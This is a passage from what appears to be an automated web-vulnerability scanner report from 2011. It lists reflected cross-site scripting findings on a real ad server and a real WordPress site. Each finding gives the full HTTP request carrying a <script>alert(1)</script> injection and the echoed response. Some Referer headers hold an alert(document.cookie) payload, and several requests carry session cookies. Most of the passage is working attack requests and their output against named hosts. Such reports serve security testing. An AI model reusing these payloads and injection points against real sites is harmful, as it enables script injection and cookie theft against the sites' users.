Date: Tue, 19 Apr 2011 20:06:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/81295705/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.22. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e9"><script>alert(1)</script>e3257083564 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/160846727/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.23. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 232e4"><script>alert(1)</script>518b442c3c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1034691805/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.24. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce9"><script>alert(1)</script>6f09d14ccb6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1306728366/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.25. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a008"><script>alert(1)</script>f83aab5e457 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/1849951236@x901a008"><script>alert(1)</script>f83aab5e457 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 335
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/6479176/x901a008"><script>alert(1)</script>f83aab5e457/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.26. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2828"><script>alert(1)</script>eab5008b54d was submitted in the REST URL parameter 1. This input was echoed as e2828\"><script>alert(1)</script>eab5008b54d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente2828"><script>alert(1)</script>eab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digibond.wpengine.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:10:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:10:10 GMT
Cache-Control: max-age=86400
X-Varnish: 1668613514
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.com/wp-contente2828\"><script>alert(1)</script>eab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=cbba07f9e4">
...[SNIP]...

3.27. http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1648a"><script>alert(1)</script>480ef64af3a was submitted in the REST URL parameter 5. This input was echoed as 1648a\"><script>alert(1)</script>480ef64af3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icallist.css1648a"><script>alert(1)</script>480ef64af3a?ver=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digibond.wpengine.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:10:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=b35e1fa86201292c876a56cd670935a8; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:10:25 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.com/wp-content/plugins/amr-ical-events-list/css/icallist.css1648a\"><script>alert(1)</script>480ef64af3a?ver=1&amp;_login=8941e066cb">
...[SNIP]...

3.28. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c916"><script>alert(1)</script>97b02068444 was submitted in the REST URL parameter 1. This input was echoed as 1c916\"><script>alert(1)</script>97b02068444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1c916"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602164
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content1c916\"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=d8531f58ad">
...[SNIP]...

3.29. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77cc0"><script>alert(1)</script>a500ca9f17c was submitted in the REST URL parameter 2. This input was echoed as 77cc0\"><script>alert(1)</script>a500ca9f17c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins77cc0"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604642
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins77cc0\"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1&amp;_login=6bb0606984">
...[SNIP]...

3.30. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icallist.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c461c"><script>alert(1)</script>81ebd71ba86 was submitted in the REST URL parameter 5. This input was echoed as c461c\"><script>alert(1)</script>81ebd71ba86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c"><script>alert(1)</script>81ebd71ba86?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c\"><script>alert(1)</script>81ebd71ba86?ver=1&amp;_login=a230e581ae">
...[SNIP]...

3.31. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d47c"><script>alert(1)</script>cccc92e06a7 was submitted in the REST URL parameter 1. This input was echoed as 6d47c\"><script>alert(1)</script>cccc92e06a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content6d47c"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602653
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content6d47c\"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1&amp;_login=a8aa1f4a55">
...[SNIP]...

3.32. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1507c"><script>alert(1)</script>38cdb41f31a was submitted in the REST URL parameter 2. This input was echoed as 1507c\"><script>alert(1)</script>38cdb41f31a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1507c"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605002
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins1507c\"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1&amp;_login=23ae79ccbf">
...[SNIP]...

3.33. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/amr-ical-events-list/css/icalprint.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64300"><script>alert(1)</script>a237d15471e was submitted in the REST URL parameter 5. This input was echoed as 64300\"><script>alert(1)</script>a237d15471e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/amr-ical-events-list/css/icalprint.css64300"><script>alert(1)</script>a237d15471e?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css64300\"><script>alert(1)</script>a237d15471e?ver=1&amp;_login=ebdae81ce4">
...[SNIP]...

3.34. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/grunion-contact-form/css/grunion.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2db02"><script>alert(1)</script>561302ac03e was submitted in the REST URL parameter 1. This input was echoed as 2db02\"><script>alert(1)</script>561302ac03e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2db02"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602153
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
